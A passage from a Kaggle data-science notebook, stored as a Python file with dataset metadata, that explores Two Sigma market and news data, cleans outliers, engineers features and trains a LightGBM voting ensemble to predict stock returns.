volume')\nplt.gca().invert_yaxis()\n\n# ### Asset Name\n\n# In[ ]:\n\n\nassetName_Volume = market_train_df.groupby('assetName')['volume'].sum().sort_values(ascending=False)\nassetName_Volume[:15].plot.barh()\nplt.ylabel('assetName')\nplt.xlabel('Trading volume')\nplt.title('Top 15 asset name by volume')\nplt.gca().invert_yaxis()\ndel assetName_Volume\n\n# The volume ranking by coorperation seems to be the same as the rank of asset codes they own, e.g. the one with most popular codes has the most trading volume\n\n# In[ ]:\n\n\nassetName_code = market_train_df.groupby('assetName')['assetCode'].nunique().reset_index().sort_values(by='assetCode',ascending=False)\n\n# In[ ]:\n\n\nassetCodeCount = assetName_code.groupby('assetCode')['assetName'].count().reset_index()\nassetCodeCount.columns = ['assetCodeNo', 'counts']\nassetCodeCount.head()\ndel assetCodeCount\n\n# **The vast majority of companies has only one asset code**. One '*company*' that has 110 actually is the 'Unknown' category. Magically, some companies don't even have any asset code. Currently I have no explanation for this.\n\n# ### Correlations\n\n# In[ ]:\n\n\ncolumns_corr_market = ['volume', 'open', 'close','returnsClosePrevRaw1','returnsOpenPrevRaw1',\\\n 'returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10','returnsOpenPrevRaw10',\\\n 'returnsClosePrevMktres10', 'returnsOpenPrevMktres10', 'returnsOpenNextMktres10']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(market_train_fill[columns_corr_market].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation')\n\n# ### Dig deeper to a single asset\n# \n# Let's take a closer look to a single asset. Here I choose the one with largest trading volumen: 'Bank of America Corp'\n\n# In[ ]:\n\n\nassetCode = 'Bank of America Corp'\nthisAssetMark_df = market_train_fill[market_train_fill['assetName']==assetCode].sort_values(by='date',ascending=True) \nthisAssetMark_df['diff_open_close'] = thisAssetMark_df['open'] - thisAssetMark_df['close']\nthisAssetNews_df = news_rmv_outlier[news_rmv_outlier['assetName']==assetCode]\n# Trading volume vs time\nthisAssetMark_df.plot(x='date', y='volume')\nplt.title('Trading volume vs time')\n# Price vs time\nthisAssetMark_df.plot(x='date', y='open')\nplt.title('Open price vs time')\n# Return vs time\nthisAssetMark_df.plot(x='date', y=['returnsOpenPrevRaw1', 'returnsOpenPrevRaw10','returnsOpenNextMktres10'], alpha=0.8)\nplt.title('Return vs time')\n\n# It can be seen that trading volume is strongly associated with price, i.e. trade increase when price hits bottom. Return is also strongly fluctuated at such time\n\n# In[ ]:\n\n\nnews_volume = thisAssetNews_df.groupby('date')['sourceId'].count().reset_index()\nnews_volume = news_volume.ewm(span=10).mean()\nnews_volume.plot(x='date',y='sourceId')\nplt.title('News volume vs time')\n\n# In[ ]:\n\n\nnews_urgency = thisAssetNews_df.groupby('date')['urgency'].mean().reset_index()\nnews_urgency = news_urgency.ewm(span=10).mean()\nnews_urgency.plot(x='date',y='urgency')\nplt.title('News urgency vs time')\n\n# The news increases in volumes and urgency as price drops\n\n# In[ ]:\n\n\nnews_relevance = thisAssetNews_df.groupby('date')['relevance'].mean().reset_index()\nnews_relevance = news_relevance.ewm(span=10).mean()\nnews_relevance.plot(x='date',y='relevance')\nplt.title('Relevance vs time')\n\n# In[ ]:\n\n\nnews_sentiment = thisAssetNews_df.groupby('date')['sentimentClass','sentimentNegative','sentimentNeutral','sentimentPositive'].mean().reset_index()\nnews_sentiment = news_sentiment.ewm(span=10).mean()\nnews_sentiment.plot(x='date',y=['sentimentClass','sentimentNegative','sentimentNeutral','sentimentPositive'], alpha=0.8)\nplt.title('Sentiment vs time')\n\n# Sentiments are mostly negative. Sentiment drops as price drops, which is expected.\n# \n# Now let's merge the news and market data and see their correlations\n\n# In[ ]:\n\n\n# Merge news and market data. Only keep numeric columns\nthisAssetMark_number = thisAssetMark_df[columns_corr_market+['date']]\nthisAssetMark_number = thisAssetMark_number.groupby('date').mean().reset_index()\nthisAssetNews_number = thisAssetNews_df[columns_corr+['date']]\nthisAssetNews_number = thisAssetNews_number.groupby('date').mean().reset_index()\nthisAssetNews_number['news_volume'] = thisAssetNews_df.groupby('date')['sourceId'].count().reset_index()['sourceId']\nthisAssetMerge = pd.merge(thisAssetMark_number, thisAssetNews_number, how='left', on = 'date')\n\n# In[ ]:\n\n\ncolumns_corr_merge = ['volume','open','close','returnsOpenPrevRaw1','returnsOpenPrevMktres1','returnsOpenPrevRaw10','returnsOpenPrevMktres10',\\\n 'returnsOpenNextMktres10','news_volume','urgency','sentenceCount','relevance','sentimentClass',\\\n 'noveltyCount24H','noveltyCount5D','volumeCounts24H','volumeCounts5D']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(thisAssetMerge[columns_corr_merge].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation market and news')\n\n# This concludes the exploratory analysis. I will now proceed on data preprocessing and model building\n\n# In[ ]:\n\n\ndel thisAssetMark_df\ndel news_relevance\ndel market_train_fill\ndel news_train_df\ndel news_rmv_outlier\n\n# \n# \n# ## Preprocessing\n\n# In[ ]:\n\n\nmarket_train_orig = market_train_orig.sort_values('time')\nnews_train_orig = news_train_orig.sort_values('time')\nmarket_train_df = market_train_orig.copy()\nnews_train_df = news_train_orig.copy()\ndel market_train_orig\ndel news_train_orig\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['time'].dt.date>=datetime.date(2009,1,1)]\nnews_train_df = news_train_df.loc[news_train_df['time'].dt.date>=datetime.date(2009,1,1)]\n\n# ### Market data\n# * **Outliers - Open to close:** the difference between open price and close price cannot be too much difference (market would corrupt otherwise). We treat these outliers by clipping the close-to-open ratio\n\n# In[ ]:\n\n\nmarket_train_df['close_open_ratio'] = np.abs(market_train_df['close']/market_train_df['open'])\nthreshold = 0.5\nprint('In %i lines price increases by 50%% or more in a day' %(market_train_df['close_open_ratio']>=1.5).sum())\nprint('In %i lines price decreases by 50%% or more in a day' %(market_train_df['close_open_ratio']<=0.5).sum())\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['close_open_ratio'] < 1.5]\nmarket_train_df = market_train_df.loc[market_train_df['close_open_ratio'] > 0.5]\nmarket_train_df = market_train_df.drop(columns=['close_open_ratio'])\n\n# * **Fill nulls - Market values:** All null data comes from market adjusted columns. We fill them up with the raw values in the same row\n\n# In[ ]:\n\n\ncolumn_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\ncolumn_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\nfor i in range(len(column_raw)):\n market_train_df[column_market[i]] = market_train_df[column_market[i]].fillna(market_train_df[column_raw[i]])\n\n# * **Outliers-Returns:** Return should not exceed 50% or falls below 50%. If it does, it is either noise, or extreme data that will confuse our prediction later on. We remove these extreme data.\n\n# In[ ]:\n\n\nprint('Removing outliers ...')\ncolumn_return = column_market + column_raw + ['returnsOpenNextMktres10']\norig_len = market_train_df.shape[0]\nfor column in column_return:\n market_train_df = market_train_df.loc[market_train_df[column]>=-2]\n market_train_df = market_train_df.loc[market_train_df[column]<=2]\nnew_len = market_train_df.shape[0]\nrmv_len = np.abs(orig_len-new_len)\nprint('There were %i lines removed' %rmv_len)\n\n# * **Remove strange data**: Here we remove data with unknown asset name or asset codes with strange behavior. For more details, see here: https://www.kaggle.com/nareyko/market-return-estimation-and-bad-data-detection\n\n# In[ ]:\n\n\nprint('Removing strange data ...')\norig_len = market_train_df.shape[0]\nmarket_train_df = market_train_df[~market_train_df['assetCode'].isin(['PGN.N','EBRYY.OB'])]\n#market_train_df = market_train_df[~market_train_df['assetName'].isin(['Unknown'])]\nnew_len = market_train_df.shape[0]\nrmv_len = np.abs(orig_len-new_len)\nprint('There were %i lines removed' %rmv_len)\n\n# ### News data\n# * **Remove outliers**: apply a clip filter to reduce too extreme data\n\n# In[ ]:\n\n\n# Function to remove outliers\ndef remove_outliers(data_frame, column_list, low=0.02, high=0.98):\n for column in column_list:\n this_column = data_frame[column]\n quant_df = this_column.quantile([low,high])\n low_limit = quant_df[low]\n high_limit = quant_df[high]\n data_frame[column] = data_frame[column].clip(lower=low_limit, upper=high_limit)\n return data_frame\n\n# In[ ]:\n\n\n# Remove outlier\ncolumns_outlier = ['takeSequence', 'bodySize', 'sentenceCount', 'wordCount', 'sentimentWordCount', 'firstMentionSentence','noveltyCount12H',\\\n 'noveltyCount24H', 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D', 'volumeCounts12H', 'volumeCounts24H',\\\n 'volumeCounts3D','volumeCounts5D','volumeCounts7D']\nprint('Clipping news outliers ...')\nnews_train_df = remove_outliers(news_train_df, columns_outlier)\n\n# \n# \n# ## Features engineering\n# \n# ### Data processing function\n# Here we make a function process both market and news data, then merge them.\n# \n\n# In[ ]:\n\n\nasset_code_dict = {k: v for v, k in enumerate(market_train_df['assetCode'].unique())}\ndrop_columns = [col for col in news_train_df.columns if col not in ['sourceTimestamp', 'urgency', 'takeSequence', 'bodySize', 'companyCount', \n 'sentenceCount', 'firstMentionSentence', 'relevance','firstCreated', 'assetCodes']]\ncolumns_news = ['firstCreated','relevance','sentimentClass','sentimentNegative','sentimentNeutral',\n 'sentimentPositive','noveltyCount24H','noveltyCount7D','volumeCounts24H','volumeCounts7D','assetCodes','sourceTimestamp',\n 'assetName','audiences', 'urgency', 'takeSequence', 'bodySize', 'companyCount', \n 'sentenceCount', 'firstMentionSentence','time']\n\n# In[ ]:\n\n\n# Data processing function\ndef data_prep(market_df,news_df):\n market_df['date'] = market_df.time.dt.date\n market_df['close_to_open'] = market_df['close'] / market_df['open']\n market_df.drop(['time'], axis=1, inplace=True)\n \n news_df = news_df[columns_news]\n news_df['sourceTimestamp']= news_df.sourceTimestamp.dt.hour\n news_df['firstCreated'] = news_df.firstCreated.dt.date\n news_df['assetCodesLen'] = news_df['assetCodes'].map(lambda x: len(eval(x)))\n news_df['assetCodes'] = news_df['assetCodes'].map(lambda x: list(eval(x))[0])\n news_df['asset_sentiment_count'] = news_df.groupby(['assetName', 'sentimentClass'])['time'].transform('count')\n news_df['len_audiences'] = news_train_df['audiences'].map(lambda x: len(eval(x)))\n kcol = ['firstCreated', 'assetCodes']\n news_df = news_df.groupby(kcol, as_index=False).mean()\n market_df = pd.merge(market_df, news_df, how='left', left_on=['date', 'assetCode'], \n right_on=['firstCreated', 'assetCodes'])\n del news_df\n market_df['assetCodeT'] = market_df['assetCode'].map(asset_code_dict)\n market_df = market_df.drop(columns = ['firstCreated','assetCodes','assetName']).fillna(0) \n return market_df\n\n# In[ ]:\n\n\nprint('Merging data ...')\nmarket_train_df = data_prep(market_train_df, news_train_df)\nmarket_train_df.head()\n\n# \n# \n# ### Data selection\n# \n# Looking at the statistics, most data behave homogeneously after 2009 (volume increase, price increase, etc.). However, before 2009, due to the burst of the housing bubble that leads to the financial crisis in 2008, the data behaves differently. So the question to make the right prediction for this problem is: **Will there be a financial crisis in the next 6 months?** If the answer is **Yes**, then we include data before 2009. If the answer is **No**, then we exclude them.\n# \n# In this notebook, I choose **No** as the answer and proceed from that.\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['date']>=datetime.date(2009,1,1)]\n\n# We then perform feature selection . Feature scaling is not needed since we plan to use lightgbm - a tree-based model, which do not require standardization.\n# \n# I tried using a regressor model, but a problem is that it gives close-to-0 values for most of prediction. Thus, I convert this problem into a classification problem: 0 for negative return and 1 for positive return\n\n# In[ ]:\n\n\nnum_columns = ['volume', 'close', 'open', 'returnsClosePrevRaw1', 'returnsOpenPrevRaw1', 'returnsClosePrevMktres1', 'returnsOpenPrevMktres1', 'returnsClosePrevRaw10', 'returnsOpenPrevRaw10', \n 'returnsClosePrevMktres10', 'returnsOpenPrevMktres10', 'close_to_open', 'sourceTimestamp', 'urgency', 'companyCount', 'takeSequence', 'bodySize', 'sentenceCount',\n 'relevance', 'sentimentClass', 'sentimentNegative', 'sentimentNeutral', 'sentimentPositive',\n 'noveltyCount24H','noveltyCount7D','volumeCounts24H','volumeCounts7D','assetCodesLen', 'asset_sentiment_count', 'len_audiences']\ncat_columns = ['assetCodeT']\nfeature_columns = num_columns+cat_columns\n\n# In[ ]:\n\n\n# Scaling of data\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\ndata_scaler = StandardScaler()\n#market_train_df[num_columns] = data_scaler.fit_transform(market_train_df[num_columns])\n#data_scaler = MinMaxScaler()\nmarket_train_df[num_columns] = data_scaler.fit_transform(market_train_df[num_columns])\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nmarket_train_df = market_train_df.reset_index()\nmarket_train_df = market_train_df.drop(columns='index')\n\n# Random train-test split\ntrain_indices, val_indices = train_test_split(market_train_df.index.values,test_size=0.1, random_state=92)\n\n# In[ ]:\n\n\n# Extract X and Y\ndef get_input(market_train, indices):\n X = market_train.loc[indices, feature_columns].values\n y = market_train.loc[indices,'returnsOpenNextMktres10'].map(lambda x: 0 if x<0 else 1).values\n #y = market_train.loc[indices,'returnsOpenNextMktres10'].map(lambda x: convert_to_class(x)).values\n r = market_train.loc[indices,'returnsOpenNextMktres10'].values\n u = market_train.loc[indices, 'universe']\n d = market_train.loc[indices, 'date']\n return X,y,r,u,d\n\n# r, u and d are used to calculate the scoring metric\nX_train,y_train,r_train,u_train,d_train = get_input(market_train_df, train_indices)\nX_val,y_val,r_val,u_val,d_val = get_input(market_train_df, val_indices)\n\n# \n# \n# ## Building model\n# \n# Here we use lightgbm classifier as our model\n# \n# ### Parameters tuning\n\n# In[ ]:\n\n\n# Set up decay learning rate\ndef learning_rate_power(current_round):\n base_learning_rate = 0.19000424246380565\n min_learning_rate = 0.01\n lr = base_learning_rate * np.power(0.995,current_round)\n return max(lr, min_learning_rate)\n\n# In[ ]:\n\n\nfrom scipy.stats import randint as sp_randint\nfrom scipy.stats import uniform as sp_uniform\n\ntune_params = {'n_estimators': [200,500,1000,2500,5000],\n 'max_depth': sp_randint(4,12),\n 'colsample_bytree':sp_uniform(loc=0.8, scale=0.15),\n 'min_child_samples':sp_randint(60,120),\n 'subsample': sp_uniform(loc=0.75, scale=0.25),\n 'reg_lambda':[1e-3, 1e-2, 1e-1, 1]}\n\nfit_params = {'early_stopping_rounds':40,\n 'eval_metric': 'accuracy',\n 'eval_set': [(X_train, y_train), (X_val, y_val)],\n 'verbose': 20,\n 'callbacks': [lgb.reset_parameter(learning_rate=learning_rate_power)]}\n\n# In[ ]:\n\n\nlgb_clf = lgb.LGBMClassifier(n_jobs=4, objective='binary',random_state=1)\ngs = RandomizedSearchCV(estimator=lgb_clf, \n param_distributions=tune_params, \n n_iter=40,\n scoring='f1',\n cv=5,\n refit=True,\n random_state=1,\n verbose=True)\n\n# Running the parameters search will take another 3 hours, so we will straight away use the best parameters \n\n# In[ ]:\n\n\nlgb_clf = lgb.LGBMClassifier(n_jobs=4,\n objective='multiclass',\n random_state=100)\nopt_params = {'n_estimators':500,\n 'boosting_type': 'dart',\n 'objective': 'binary',\n 'num_leaves':2452,\n 'min_child_samples':212,\n 'reg_lambda':0.01}\nlgb_clf.set_params(**opt_params)\nlgb_clf.fit(X_train, y_train,**fit_params)\n\n# In[ ]:\n\n\nprint('Training accuracy: ', accuracy_score(y_train, lgb_clf.predict(X_train)))\nprint('Validation accuracy: ', accuracy_score(y_val, lgb_clf.predict(X_val)))\n\n# \n# \n# ### Visualizing the result\n\n# In[ ]:\n\n\nfeatures_imp = pd.DataFrame()\nfeatures_imp['features'] = list(feature_columns)[:]\nfeatures_imp['importance'] = lgb_clf.feature_importances_\nfeatures_imp = features_imp.sort_values(by='importance', ascending=False).reset_index()\n\ny_plot = -np.arange(15)\nplt.figure(figsize=(10,6))\nplt.barh(y_plot, features_imp.loc[:14,'importance'].values)\nplt.yticks(y_plot,(features_imp.loc[:14,'features']))\nplt.xlabel('Feature importance')\nplt.title('Features importance')\nplt.tight_layout()\n\n# In[ ]:\n\n\n# Rescale confidence\ndef rescale(data_in, data_ref):\n scaler_ref = StandardScaler()\n scaler_ref.fit(data_ref.reshape(-1,1))\n scaler_in = StandardScaler()\n data_in = scaler_in.fit_transform(data_in.reshape(-1,1))\n data_in = scaler_ref.inverse_transform(data_in)[:,0]\n return data_in\n\n# In[ ]:\n\n\ndef confidence_out(y_pred):\n confidence = np.zeros(y_pred.shape[0])\n for i in range(len(confidence)):\n if y_pred[i,:].argmax() != 1:\n confidence[i] = y_pred[i,2]-y_pred[i,0]\n return confidence\n\n# In[ ]:\n\n\ny_pred_proba = lgb_clf.predict_proba(X_val)\npredicted_return = y_pred_proba[:,1] - y_pred_proba[:,0]\n#predicted_return = confidence_out(y_pred_proba)\npredicted_return = rescale(predicted_return, r_train)\n\n# In[ ]:\n\n\n# distribution of confidence that will be used as submission\nplt.hist(predicted_return, bins='auto', label='Predicted confidence')\nplt.hist(r_val, bins='auto',alpha=0.8, label='True market return')\nplt.title(\"predicted confidence\")\nplt.legend(loc='best')\nplt.xlim(-1,1)\nplt.show()\n\n# In[ ]:\n\n\n# calculation of actual metric that is used to calculate final score\nr_val = r_val.clip(-1,1) # get rid of outliers.\nx_t_i = predicted_return * r_val * u_val\ndata = {'day' : d_val, 'x_t_i' : x_t_i}\ndf = pd.DataFrame(data)\nx_t = df.groupby('day').sum().values.flatten()\nmean = np.mean(x_t)\nstd = np.std(x_t)\nscore_valid = mean / std\nprint('Validation score', score_valid)\n\n# \n# ### Voting ensemble\n# Now we construct an ensemble of multiple classifier and use soft voting to get the final result\n\n# In[ ]:\n\n\n# This code is inspired from this kernel: https://www.kaggle.com/skooch/lgbm-w-random-split-2\nclfs = []\nfor i in range(20):\n clf = lgb.LGBMClassifier(learning_rate=0.1, random_state=1200+i, silent=True,\n n_jobs=4, n_estimators=2500)\n clf.set_params(**opt_params)\n clfs.append(('lgbm%i'%i, clf))\n\ndef split_data(X, y, test_percentage=0.2, seed=None):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_percentage)\n return X_train, y_train, X_test, y_test \n\ndef _parallel_fit_estimator(estimator, X, y, sample_weight=None, **fit_params):\n \n # randomly split the data so we have a test set for early stopping\n X_train, y_train, X_test, y_test = split_data(X, y, seed=1992)\n \n # update the fit params with our new split\n fit_params[\"eval_set\"] = [(X_train,y_train), (X_test,y_test)]\n \n # fit the estimator\n if sample_weight is not None:\n estimator.fit(X_train, y_train, sample_weight=sample_weight, **fit_params)\n else:\n estimator.fit(X_train, y_train, **fit_params)\n return estimator\n\n# In[ ]:\n\n\nclass VotingClassifierLGBM(VotingClassifier):\n '''\n This implements the fit method of the VotingClassifier propagating fit_params\n '''\n def fit(self, X, y, sample_weight=None, **fit_params):\n \n if isinstance(y, np.ndarray) and len(y.shape) > 1 and y.shape[1] > 1:\n raise NotImplementedError('Multilabel and multi-output'\n ' classification is not supported.')\n\n if self.voting not in ('soft', 'hard'):\n raise ValueError(\"Voting must be 'soft' or 'hard'; got (voting=%r)\"\n % self.voting)\n\n if self.estimators is None or len(self.estimators) == 0:\n raise AttributeError('Invalid `estimators` attribute, `estimators`'\n ' should be a list of (string, estimator)'\n ' tuples')\n\n if (self.weights is not None and\n len(self.weights) != len(self.estimators)):\n raise ValueError('Number of classifiers and weights must be equal'\n '; got %d weights, %d estimators'\n % (len(self.weights), len(self.estimators)))\n\n if sample_weight is not None:\n for name, step in self.estimators:\n if not has_fit_parameter(step, 'sample_weight'):\n raise ValueError('Underlying estimator \\'%s\\' does not'\n ' support sample weights.' % name)\n names, clfs = zip(*self.estimators)\n self._validate_names(names)\n\n n_isnone = np.sum([clf is None for _, clf in self.estimators])\n if n_isnone == len(self.estimators):\n raise ValueError('All estimators are None. At least one is '\n 'required to be a classifier!')\n\n self.le_ = LabelEncoder().fit(y)\n self.classes_ = self.le_.classes_\n self.estimators_ = []\n\n transformed_y = self.le_.transform(y)\n\n self.estimators_ = Parallel(n_jobs=self.n_jobs)(\n delayed(_parallel_fit_estimator)(clone(clf), X, transformed_y,\n sample_weight=sample_weight, **fit_params)\n for clf in clfs if clf is not None)\n\n return self\n\n# In[ ]:\n\n\nvc = VotingClassifierLGBM(clfs, voting='soft')\nvc.fit(X_train, y_train, **fit_params)\nfilename = 'VotingClassifierLGBM.sav'\npickle.dump(vc, open(filename, 'wb'))\n\n# In[ ]:\n\n\nvc = pickle.load(open(filename, 'rb'))\nvc.voting = 'soft'\npredicted_class = vc.predict(X_val)\npredicted_return = vc.predict_proba(X_val)\n#predicted_return = confidence_out(predicted_return)\npredicted_return = vc.predict_proba(X_val)[:,1]*2-1\npredicted_return = rescale(predicted_return, r_train)\n\n# In[ ]:\n\n\nplt.hist(predicted_class, bins='auto')\n\n# In[ ]:\n\n\nvc.voting = 'soft'\nglobal_accuracy_soft = accuracy_score(y_val, predicted_class)\nglobal_f1_soft = f1_score(y_val, predicted_class)\nprint('Accuracy score clfs: %f' % global_accuracy_soft)\nprint('F1 score clfs: %f' % global_f1_soft)\n\n# In[ ]:\n\n\n# distribution of confidence that will be used as submission\nplt.hist(predicted_return, bins='auto', label='Prediciton')\nplt.hist(r_val, bins='auto',alpha=0.8, label='True data')\nplt.title(\"predicted confidence\")\nplt.legend(loc='best')\nplt.xlim(-1,1)\nplt.show()\n\n# In[ ]:\n\n\n# calculation of actual metric that is used to calculate final score\nr_val = r_val.clip(-1,1) # get rid of outliers. Where do they come from??\nx_t_i = predicted_return * r_val * u_val\ndata = {'day' : d_val, 'x_t_i' : x_t_i}\ndf = pd.DataFrame(data)\nx_t = df.groupby('day').sum().values.flatten()\nmean = np.mean(x_t)\nstd = np.std(x_t)\nscore_valid = mean / std\nprint('Validation score', score_valid)\n\n# \n# ## Making submission\n\n# In[ ]:\n\n\ndays = env.get_prediction_days()\nn_days = 0\nprep_time = 0\nprediction_time = 0\npackaging_time = 0\nfor (market_obs_df, news_obs_df, predictions_template_df) in days:\n n_days +=1\n if n_days % 50 == 0:\n print(n_days,end=' ')\n\n t = time.time()\n column_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\n column_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\n market_obs_df['close_open_ratio'] = np.abs(market_obs_df['close']/market_obs_df['open'])\n for i in range(len(column_raw)):\n market_obs_df[column_market[i]] = market_obs_df[column_market[i]].fillna(market_obs_df[column_raw[i]])\n\n market_obs_df = market_obs_df[market_obs_df.assetCode.isin(predictions_template_df.assetCode)]\n market_obs_df = market_obs_df[market_obs_df.assetCode.isin(asset_code_dict.keys())]\n market_obs = data_prep(market_obs_df, news_obs_df)\n market_obs[num_columns] = data_scaler.transform(market_obs[num_columns])\n X_live = market_obs[feature_columns].values\n prep_time += time.time() - t\n\n t = time.time()\n lp = vc.predict_proba(X_live)\n prediction_time += time.time() -t\n\n t = time.time()\n confidence = lp[:,1] - lp[:,0]\n #confidence = confidence_out(lp)\n confidence = rescale(confidence, r_train)\n preds = pd.DataFrame({'assetCode':market_obs['assetCode'],'confidence':confidence})\n predictions_template_df = predictions_template_df.merge(preds,how='left').drop('confidenceValue',axis=1).fillna(0).rename(columns={'confidence':'confidenceValue'})\n env.predict(predictions_template_df)\n packaging_time += time.time() - t\n\nenv.write_submission_file()\n\n# In[ ]:\n\n\nplt.hist(confidence, bins='auto')\nplt.title(\"predicted confidence\")\nplt.show()\n\n# This concludes my work for this problem. Please let me know if you have any suggestion. Thank you\n\n# \n", "repo_name": "tetherless-world/CodeGraph", "sub_path": "kaggle/python_files/sample166.py", "file_name": "sample166.py", "file_ext": "py", "file_size_in_byte": 41922, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.rcParams", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 32, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 35, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 61, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 62, "usage_type": "attribute"}, {"api_name": "kaggle.competitions.twosigmanews.make_env", "line_number": 69, "usage_type": "call"}, {"api_name": "kaggle.competitions.twosigmanews", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 230, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 231, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 262, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 291, "usage_type": "call"}, {"api_name": 